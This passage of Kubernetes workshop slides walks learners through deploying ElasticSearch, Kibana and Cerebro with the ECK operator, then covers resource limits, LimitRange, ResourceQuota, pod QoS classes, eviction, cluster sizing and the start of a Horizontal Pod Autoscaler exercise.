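  version: 7.8.0          # illustrative version number
  nodeSets:
  - name: default
    count: 1              # number of ElasticSearch nodes in this set
    config:
      node.store.allow_mmap: false
```

The operator watches resources of this kind and creates the StatefulSets, Services, and Secrets needed to run the cluster.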
.debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Obtaining the credentials - The operator creates a user named `elastic` - It generates a random password and stores it in a Secret .exercise[ - Extract the password: ```bash kubectl get secret demo-es-elastic-user \ -o go-template="{{ .data.elastic | base64decode }} " ``` - Use it to connect to the API: ```bash curl -u elastic:`PASSWORD` http://`CLUSTERIP`:9200 ``` ] We should see a JSON payload with the `"You Know, for Search"` tagline. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Sending data to the cluster - Let's send some data to our brand new ElasticSearch cluster! - We'll deploy a filebeat DaemonSet to collect node logs .exercise[ - Deploy filebeat: ```bash kubectl apply -f ~/container.training/k8s/eck-filebeat.yaml ``` - Wait until some pods are up: ```bash watch kubectl get pods -l k8s-app=filebeat ``` - Check that a filebeat index was created: ```bash curl -u elastic:`PASSWORD` http://`CLUSTERIP`:9200/_cat/indices ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Deploying an instance of Kibana - Kibana can visualize the logs injected by filebeat - The ECK operator can also manage Kibana - Let's give it a try! .exercise[ - Deploy a Kibana instance: ```bash kubectl apply -f ~/container.training/k8s/eck-kibana.yaml ``` - Wait for it to be ready: ```bash kubectl get kibana -w ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Connecting to Kibana - Kibana is automatically set up to connect to ElasticSearch (this is arranged by the YAML that we're using) - However, it will ask for authentication - It's using the same user/password as ElasticSearch .exercise[ - Get the NodePort allocated to Kibana: ```bash kubectl get services ``` - Connect to it with a web browser - Use the same user/password as before ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Setting up Kibana After the Kibana UI loads, we need to click around a bit .exercise[ - Pick "explore on my own" - Click on "Use Elasticsearch data / Connect to your Elasticsearch index" - Enter `filebeat-*` for the index pattern and click "Next step" - Select `@timestamp` as time filter field name - Click on "discover" (the small icon looking like a compass on the left bar) - Play around! ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Scaling up the cluster - At this point, we have only one node - We are going to scale up - But first, we'll deploy Cerebro, a UI for ElasticSearch - This will let us see the state of the cluster, how indexes are sharded, etc. .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Deploying Cerebro - Cerebro is stateless, so it's fairly easy to deploy (one Deployment + one Service) - However, it needs the address and credentials for ElasticSearch - We prepared yet another manifest for that!
.exercise[ - Deploy Cerebro: ```bash kubectl apply -f ~/container.training/k8s/eck-cerebro.yaml ``` - Lookup the NodePort number and connect to it: ```bash kubectl get services ``` ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Scaling up the cluster - We can see on Cerebro that the cluster is "yellow" (because our index is not replicated) - Let's change that! .exercise[ - Edit the ElasticSearch cluster manifest: ```bash kubectl edit es demo ``` - Find the field `count: 1` and change it to 3 - Save and quit ] .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Deploying our apps with operators - It is very simple to deploy with `kubectl create deployment` / `kubectl expose` - We can unlock more features by writing YAML and using `kubectl apply` - Kustomize or Helm let us deploy in multiple environments (and adjust/tweak parameters in each environment) - We can also use an operator to deploy our application .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Pros and cons of deploying with operators - The app definition and configuration is persisted in the Kubernetes API - Multiple instances of the app can be manipulated with `kubectl get` - We can add labels, annotations to the app instances - Our controller can execute custom code for any lifecycle event - However, we need to write this controller - We need to be careful about changes (what happens when the resource `spec` is updated?) .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- ## Operators are not magic - Look at the ElasticSearch resource definition (`~/container.training/k8s/eck-elasticsearch.yaml`) - What should happen if we flip the TLS flag? Twice? - What should happen if we add another group of nodes? - What if we want different images or parameters for the different nodes? *Operators can be very powerful.
But we need to know exactly the scenarios that they can handle.* ??? :EN:- Kubernetes operators :EN:- Deploying ElasticSearch with ECK :FR:- Les opérateurs :FR:- Déployer ElasticSearch avec ECK .debug[[k8s/operators.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/container-cranes.jpg)] --- name: toc-resource-limits class: title Resource Limits .nav[ [Previous section](#toc-operators) | [Back to table of contents](#toc-module-3) | [Next section](#toc-defining-min-max-and-default-resources) ] .debug[(automatically generated title slide)] --- # Resource Limits - We can attach resource indications to our pods (or rather: to the *containers* in our pods) - We can specify *limits* and/or *requests* - We can specify quantities of CPU and/or memory .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## CPU vs memory - CPU is a *compressible resource* (it can be preempted immediately without adverse effect) - Memory is an *incompressible resource* (it needs to be swapped out to be reclaimed; and this is costly) - As a result, exceeding limits will have different consequences for CPU and memory .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Exceeding CPU limits - CPU can be reclaimed instantaneously (in fact, it is preempted hundreds of times per second, at each context switch) - If a container uses too much CPU, it can be throttled (it will be scheduled less often) - The processes in that container will run slower (or rather: they will not run faster) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Exceeding memory limits - Memory needs to be swapped out before being reclaimed - "Swapping" means writing memory pages to disk, which is very slow - On a classic system, a process that swaps can get 1000x slower (because disk I/O is 1000x slower than memory I/O) - Exceeding the memory limit (even by a small amount) can reduce performance *a lot* - Kubernetes *does not support swap* (more on that later!) - Exceeding the memory limit will cause the container to be killed .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Limits vs requests - Limits are "hard limits" (they can't be exceeded) - a container exceeding its memory limit is killed - a container exceeding its CPU limit is throttled - Requests are used for scheduling purposes - a container using *less* than what it requested will never be killed or throttled - the scheduler uses the requested sizes to determine placement - the resources requested by all pods on a node will never exceed the node size .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Pod quality of service Each pod is assigned a QoS class (visible in `status.qosClass`). 
- If limits = requests: - as long as the container uses less than the limit, it won't be affected - if all containers in a pod have *(limits=requests)*, QoS is considered "Guaranteed" - If requests < limits: - as long as the container uses less than the request, it won't be affected - otherwise, it might be killed/evicted if the node gets overloaded - if at least one container has *(requests<limits)*, QoS is considered "Burstable" - If a pod doesn't have any request or limit, QoS is considered "BestEffort" .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Quality of service impact - When a node is overloaded, BestEffort pods are killed first - Then, Burstable pods that exceed their requests - Burstable and Guaranteed pods below their requests are never killed (except if their node fails) - If we only use Guaranteed pods, no pod should ever be killed (as long as they stay within their limits) (Pod QoS is also explained in [this page](https://kubernetes.io/docs/tasks/configure-pod-container/quality-service-pod/) of the Kubernetes documentation and in [this blog post](https://medium.com/google-cloud/quality-of-service-class-qos-in-kubernetes-bb76a89eb2c6).) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Where is my swap? - The semantics of memory and swap limits on Linux cgroups are complex - In particular, it's not possible to disable swap for a cgroup (the closest option is to [reduce "swappiness"](https://unix.stackexchange.com/questions/77939/turning-off-swapping-for-only-one-process-with-cgroups)) - The architects of Kubernetes wanted to ensure that Guaranteed pods never swap - The only solution was to disable swap entirely .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Alternative point of view - Swap enables paging¹ of anonymous² memory - Even when swap is disabled, Linux will still page memory for: - executables, libraries - mapped files - Disabling swap *will reduce performance and available resources* - For a good time, read [kubernetes/kubernetes#53533](https://github.com/kubernetes/kubernetes/issues/53533) - Also read this [excellent blog post about swap](https://jvns.ca/blog/2017/02/17/mystery-swap/) ¹Paging: reading/writing memory pages from/to disk to reclaim physical memory ²Anonymous memory: memory that is not backed by files or blocks .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Enabling swap anyway - If you don't care that pods are swapping, you can enable swap - You will need to add the flag `--fail-swap-on=false` to kubelet (otherwise, it won't start!)
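Coming back to QoS classes for a moment: here is a minimal Pod sketch (hypothetical names) that would be classified as Guaranteed, since limits and requests are equal for its only container:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: qos-demo            # hypothetical name
spec:
  containers:
  - name: app
    image: nginx            # any image would do
    resources:
      requests:
        cpu: "250m"
        memory: "256Mi"
      limits:               # limits == requests → Guaranteed
        cpu: "250m"
        memory: "256Mi"
```

Raising the limits above the requests (or removing them while keeping the requests) would make this Pod Burstable; removing the `resources` section entirely would make it BestEffort. The assigned class is visible in `status.qosClass`.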
.debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Specifying resources - Resource requests are expressed at the *container* level - CPU is expressed in "virtual CPUs" (corresponding to the virtual CPUs offered by some cloud providers) - CPU can be expressed with a decimal value, or even a "milli" suffix (so 100m = 0.1) - Memory is expressed in bytes - Memory can be expressed with k, M, G, T, ki, Mi, Gi, Ti suffixes (corresponding to 10^3, 10^6, 10^9, 10^12, 2^10, 2^20, 2^30, 2^40) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Specifying resources in practice This is what the spec of a Pod with resources will look like: ```yaml containers: - name: httpenv image: jpetazzo/httpenv resources: limits: memory: "100Mi" cpu: "100m" requests: memory: "100Mi" cpu: "10m" ``` This set of resources makes sure that this service won't be killed (as long as it stays below 100 MB of RAM), but allows its CPU usage to be throttled if necessary. .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Default values - If we specify a limit without a request: the request is set to the limit - If we specify a request without a limit: there will be no limit (which means that the limit will be the size of the node) - If we don't specify anything: the request is zero and the limit is the size of the node *Unless there are default values defined for our namespace!* .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## We need default resource values - If we do not set resource values at all: - the limit is "the size of the node" - the request is zero - This is generally *not* what we want - a container without a limit can use up all the resources of a node - if the request is zero, the scheduler can't make a smart placement decision - To address this, we can set default values for resources - This is done with a LimitRange object .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/container-housing.jpg)] --- name: toc-defining-min-max-and-default-resources class: title Defining min, max, and default resources .nav[ [Previous section](#toc-resource-limits) | [Back to table of contents](#toc-module-3) | [Next section](#toc-namespace-quotas) ] .debug[(automatically generated title slide)] --- # Defining min, max, and default resources - We can create LimitRange objects to indicate any combination of: - min and/or max resources allowed per pod - default resource *limits* - default resource *requests* - maximal burst ratio (*limit/request*) - LimitRange objects are namespaced - They apply to their namespace only .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## LimitRange example ```yaml apiVersion: v1 kind: LimitRange metadata: name: my-very-detailed-limitrange spec: limits: - type: Container min: cpu: "100m" max: cpu: "2000m" memory: "1Gi" default: cpu: "500m" memory: "250Mi" defaultRequest: cpu: "500m" ``` 
.debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Example explanation The YAML on the previous slide shows an example LimitRange object specifying very detailed limits on CPU usage, and providing defaults on RAM usage. Note the `type: Container` line: in the future, it might also be possible to specify limits per Pod, but it's not [officially documented yet](https://github.com/kubernetes/website/issues/9585). .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## LimitRange details - LimitRange restrictions are enforced only when a Pod is created (they don't apply retroactively) - They don't prevent creation of e.g. an invalid Deployment or DaemonSet (but the pods will not be created as long as the LimitRange is in effect) - If there are multiple LimitRange restrictions, they all apply together (which means that it's possible to specify conflicting LimitRanges,
preventing any Pod from being created) - If a LimitRange specifies a `max` for a resource but no `default`,
that `max` value becomes the `default` limit too .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/containers-by-the-water.jpg)] --- name: toc-namespace-quotas class: title Namespace quotas .nav[ [Previous section](#toc-defining-min-max-and-default-resources) | [Back to table of contents](#toc-module-3) | [Next section](#toc-limiting-resources-in-practice) ] .debug[(automatically generated title slide)] --- # Namespace quotas - We can also set quotas per namespace - Quotas apply to the total usage in a namespace (e.g. total CPU limits of all pods in a given namespace) - Quotas can apply to resource limits and/or requests (like the CPU and memory limits that we saw earlier) - Quotas can also apply to other resources: - "extended" resources (like GPUs) - storage size - number of objects (number of pods, services...) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Creating a quota for a namespace - Quotas are enforced by creating a ResourceQuota object - ResourceQuota objects are namespaced, and apply to their namespace only - We can have multiple ResourceQuota objects in the same namespace - The most restrictive values are used .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Limiting total CPU/memory usage - The following YAML specifies an upper bound for *limits* and *requests*: ```yaml apiVersion: v1 kind: ResourceQuota metadata: name: a-little-bit-of-compute spec: hard: requests.cpu: "10" requests.memory: 10Gi limits.cpu: "20" limits.memory: 20Gi ``` These quotas will apply to the namespace where the ResourceQuota is created. .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Limiting number of objects - The following YAML specifies how many objects of specific types can be created: ```yaml apiVersion: v1 kind: ResourceQuota metadata: name: quota-for-objects spec: hard: pods: 100 services: 10 secrets: 10 configmaps: 10 persistentvolumeclaims: 20 services.nodeports: 0 services.loadbalancers: 0 count/roles.rbac.authorization.k8s.io: 10 ``` (The `count/` syntax allows limiting arbitrary objects, including CRDs.) 
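The `count/` syntax also works for the custom resources that we defined earlier in this module; for instance, the following sketch (hypothetical name) would cap the number of Coffee objects in a namespace:

```yaml
apiVersion: v1
kind: ResourceQuota
metadata:
  name: quota-for-coffees      # hypothetical name
spec:
  hard:
    # count/<plural>.<group> targets one specific resource type
    count/coffees.container.training: "10"
```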
.debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## YAML vs CLI - Quotas can be created with a YAML definition - ...Or with the `kubectl create quota` command - Example: ```bash kubectl create quota my-resource-quota --hard=pods=300,limits.memory=300Gi ``` - With both YAML and CLI form, the values are always under the `hard` section (there is no `soft` quota) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Viewing current usage When a ResourceQuota is created, we can see how much of it is used: ``` kubectl describe resourcequota my-resource-quota Name: my-resource-quota Namespace: default Resource Used Hard -------- ---- ---- pods 12 100 services 1 5 services.loadbalancers 0 0 services.nodeports 0 0 ``` .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Advanced quotas and PriorityClass - Since Kubernetes 1.12, it is possible to create PriorityClass objects - Pods can be assigned a PriorityClass - Quotas can be linked to a PriorityClass - This allows us to reserve resources for pods within a namespace - For more details, check [this documentation page](https://kubernetes.io/docs/concepts/policy/resource-quotas/#resource-quota-per-priorityclass) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/distillery-containers.jpg)] --- name: toc-limiting-resources-in-practice class: title Limiting resources in practice .nav[ [Previous section](#toc-namespace-quotas) | [Back to table of contents](#toc-module-3) | [Next section](#toc-checking-pod-and-node-resource-usage) ] .debug[(automatically generated title slide)] --- # Limiting resources in practice - We have at least three mechanisms: - requests and limits per Pod - LimitRange per namespace - ResourceQuota per namespace - Let's see a simple recommendation to get started with resource limits .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Set a LimitRange - In each namespace, create a LimitRange object - Set a small default CPU request and CPU limit (e.g. "100m") - Set a default memory request and limit depending on your most common workload - for Java, Ruby: start with "1G" - for Go, Python, PHP, Node: start with "250M" - Set upper bounds slightly below your expected node size (80-90% of your node size, with at least a 500M memory buffer) .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Set a ResourceQuota - In each namespace, create a ResourceQuota object - Set generous CPU and memory limits (e.g. 
half the cluster size if the cluster hosts multiple apps) - Set generous objects limits - these limits should not be here to constrain your users - they should catch a runaway process creating many resources - example: a custom controller creating many pods .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Observe, refine, iterate - Observe the resource usage of your pods (we will see how in the next chapter) - Adjust individual pod limits - If you see trends: adjust the LimitRange (rather than adjusting every individual set of pod limits) - Observe the resource usage of your namespaces (with `kubectl describe resourcequota ...`) - Rinse and repeat regularly .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- ## Additional resources - [A Practical Guide to Setting Kubernetes Requests and Limits](http://blog.kubecost.com/blog/requests-and-limits/) - explains what requests and limits are - provides guidelines to set requests and limits - gives PromQL expressions to compute good values
(our app needs to be running for a while) - [Kube Resource Report](https://github.com/hjacobs/kube-resource-report/) - generates web reports on resource usage - [static demo](https://hjacobs.github.io/kube-resource-report/sample-report/output/index.html) | [live demo](https://kube-resource-report.demo.j-serv.de/applications.html) ??? :EN:- Setting compute resource limits :EN:- Defining default policies for resource usage :EN:- Managing cluster allocation and quotas :EN:- Resource management in practice :FR:- Allouer et limiter les ressources des conteneurs :FR:- Définir des ressources par défaut :FR:- Gérer les quotas de ressources au niveau du cluster :FR:- Conseils pratiques .debug[[k8s/resource-limits.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/resource-limits.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/lots-of-containers.jpg)] --- name: toc-checking-pod-and-node-resource-usage class: title Checking pod and node resource usage .nav[ [Previous section](#toc-limiting-resources-in-practice) | [Back to table of contents](#toc-module-3) | [Next section](#toc-cluster-sizing) ] .debug[(automatically generated title slide)] --- # Checking pod and node resource usage - Since Kubernetes 1.8, metrics are collected by the [resource metrics pipeline](https://kubernetes.io/docs/tasks/debug-application-cluster/resource-metrics-pipeline/) - The resource metrics pipeline is: - optional (Kubernetes can function without it) - necessary for some features (like the Horizontal Pod Autoscaler) - exposed through the Kubernetes API using the [aggregation layer](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) - usually implemented by the "metrics server" .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## How to know if the metrics server is running? - The easiest way to know is to run `kubectl top` .exercise[ - Check if the core metrics pipeline is available: ```bash kubectl top nodes ``` ] If it shows our nodes and their CPU and memory load, we're good! .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## Installing metrics server - The metrics server doesn't have any particular requirements (it doesn't need persistence, as it doesn't *store* metrics) - It has its own repository, [kubernetes-incubator/metrics-server](https://github.com/kubernetes-incubator/metrics-server) - The repository comes with [YAML files for deployment](https://github.com/kubernetes-incubator/metrics-server/tree/master/deploy/1.8%2B) - These files may not work on some clusters (e.g. 
if your node names are not in DNS) - The container.training repository has a [metrics-server.yaml](https://github.com/jpetazzo/container.training/blob/master/k8s/metrics-server.yaml#L90) file to help with that (we can `kubectl apply -f` that file if needed) .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## Showing container resource usage - Once the metrics server is running, we can check container resource usage .exercise[ - Show resource usage across all containers: ```bash kubectl top pods --containers --all-namespaces ``` ] - We can also use selectors (`-l app=...`) .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- ## Other tools - kube-capacity is a great CLI tool to view resources (https://github.com/robscott/kube-capacity) - It can show resource and limits, and compare them with usage - It can show utilization per node, or per pod - kube-resource-report can generate HTML reports (https://github.com/hjacobs/kube-resource-report) ??? :EN:- The *core metrics pipeline* :FR:- Le *core metrics pipeline* .debug[[k8s/metrics-server.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/metrics-server.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/plastic-containers.JPG)] --- name: toc-cluster-sizing class: title Cluster sizing .nav[ [Previous section](#toc-checking-pod-and-node-resource-usage) | [Back to table of contents](#toc-module-3) | [Next section](#toc-the-horizontal-pod-autoscaler) ] .debug[(automatically generated title slide)] --- # Cluster sizing - What happens when the cluster gets full? - How can we scale up the cluster? - Can we do it automatically? - What are other methods to address capacity planning? .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## When are we out of resources? - kubelet monitors node resources: - memory - node disk usage (typically the root filesystem of the node) - image disk usage (where container images and RW layers are stored) - For each resource, we can provide two thresholds: - a hard threshold (if it's met, it provokes immediate action) - a soft threshold (provokes action only after a grace period) - Resource thresholds and grace periods are configurable (by passing kubelet command-line flags) .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## What happens then? - If disk usage is too high: - kubelet will try to remove terminated pods - then, it will try to *evict* pods - If memory usage is too high: - it will try to evict pods - The node is marked as "under pressure" - This temporarily prevents new pods from being scheduled on the node .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Which pods get evicted? 
- kubelet looks at the pods' QoS and PriorityClass - First, pods with BestEffort QoS are considered - Then, pods with Burstable QoS exceeding their *requests* (but only if the exceeding resource is the one that is low on the node) - Finally, pods with Guaranteed QoS, and Burstable pods within their requests - Within each group, pods are sorted by PriorityClass - If there are pods with the same PriorityClass, they are sorted by usage excess (i.e. the pods whose usage exceeds their requests the most are evicted first) .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- class: extra-details ## Eviction of Guaranteed pods - *Normally*, pods with Guaranteed QoS should not be evicted - A chunk of resources is reserved for node processes (like kubelet) - It is expected that these processes won't use more than this reservation - If they do use more resources anyway, all bets are off! - If this happens, kubelet must evict Guaranteed pods to preserve node stability (or Burstable pods that are still within their requested usage) .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## What happens to evicted pods? - The pod is terminated - It is marked as `Failed` at the API level - If the pod was created by a controller, the controller will recreate it - The pod will be recreated on another node, *if there are resources available!* - For more details about the eviction process, see: - [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction, - [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption. .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## What if there are no resources available? - Sometimes, a pod cannot be scheduled anywhere: - all the nodes are under pressure, - or the pod requests more resources than are available - The pod then remains in `Pending` state until the situation improves .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Cluster scaling - One way to improve the situation is to add new nodes - This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler) - The autoscaler will automatically scale up: - if there are pods that failed to be scheduled - The autoscaler will automatically scale down: - if nodes have a low utilization for an extended period of time .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Restrictions, gotchas ... 
- The Cluster Autoscaler only supports a few cloud infrastructures (see [here](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for a list) - The Cluster Autoscaler cannot scale down nodes that have pods using: - local storage - affinity/anti-affinity rules preventing them from being rescheduled - a restrictive PodDisruptionBudget .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- ## Other way to do capacity planning - "Running Kubernetes without nodes" - Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or [Kiyot](https://static.elotl.co/docs/latest/kiyot/kiyot.html) can run pods using on-demand resources - Virtual Kubelet can leverage e.g. ACI or Fargate to run pods - Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod) - Economic advantage (no wasted capacity) - Security advantage (stronger isolation between pods) Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details. ??? :EN:- What happens when the cluster is at, or over, capacity :EN:- Cluster sizing and scaling :FR:- Ce qui se passe quand il n'y a plus assez de ressources :FR:- Dimensionner et redimensionner ses clusters .debug[[k8s/cluster-sizing.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/cluster-sizing.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-1.jpg)] --- name: toc-the-horizontal-pod-autoscaler class: title The Horizontal Pod Autoscaler .nav[ [Previous section](#toc-cluster-sizing) | [Back to table of contents](#toc-module-3) | [Next section](#toc-collecting-metrics-with-prometheus) ] .debug[(automatically generated title slide)] --- # The Horizontal Pod Autoscaler - What is the Horizontal Pod Autoscaler, or HPA? - It is a controller that can perform *horizontal* scaling automatically - Horizontal scaling = changing the number of replicas (adding/removing pods) - Vertical scaling = changing the size of individual replicas (increasing/reducing CPU and RAM per pod) - Cluster scaling = changing the size of the cluster (adding/removing nodes) .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Principle of operation - Each HPA resource (or "policy") specifies: - which object to monitor and scale (e.g. a Deployment, ReplicaSet...) - min/max scaling ranges (the max is a safety limit!) - a target resource usage (e.g. the default is CPU=80%) - The HPA continuously monitors the CPU usage for the related object - It computes how many pods should be running: `TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)` - It scales the related object up/down to this target number of pods .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Pre-requirements - The metrics server needs to be running (i.e. we need to be able to see pod metrics with `kubectl top pods`) - The pods that we want to autoscale need to have resource requests (because the target CPU% is not absolute, but relative to the request) - The latter actually makes a lot of sense: - if a Pod doesn't have a CPU request, it might be using 10% of CPU... - ...but only because there is no CPU time available! 
- this makes sure that we won't add pods to nodes that are already resource-starved .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Testing the HPA - We will start a CPU-intensive web service - We will send some traffic to that service - We will create an HPA policy - The HPA will automatically scale up the service for us .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## A CPU-intensive web service - Let's use `jpetazzo/busyhttp` (it is a web server that will use 1s of CPU for each HTTP request) .exercise[ - Deploy the web server: ```bash kubectl create deployment busyhttp --image=jpetazzo/busyhttp ``` - Expose it with a ClusterIP service: ```bash kubectl expose deployment busyhttp --port=80 ``` - Get the ClusterIP allocated to the service: ```bash kubectl get svc busyhttp ``` ] .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Monitor what's going on - Let's start a bunch of commands to watch what is happening .exercise[ - Monitor pod CPU usage: ```bash watch kubectl top pods -l app=busyhttp ``` - Monitor service latency: ```bash httping http://`$CLUSTERIP`/ ``` - Monitor cluster events: ```bash kubectl get events -w ``` ] 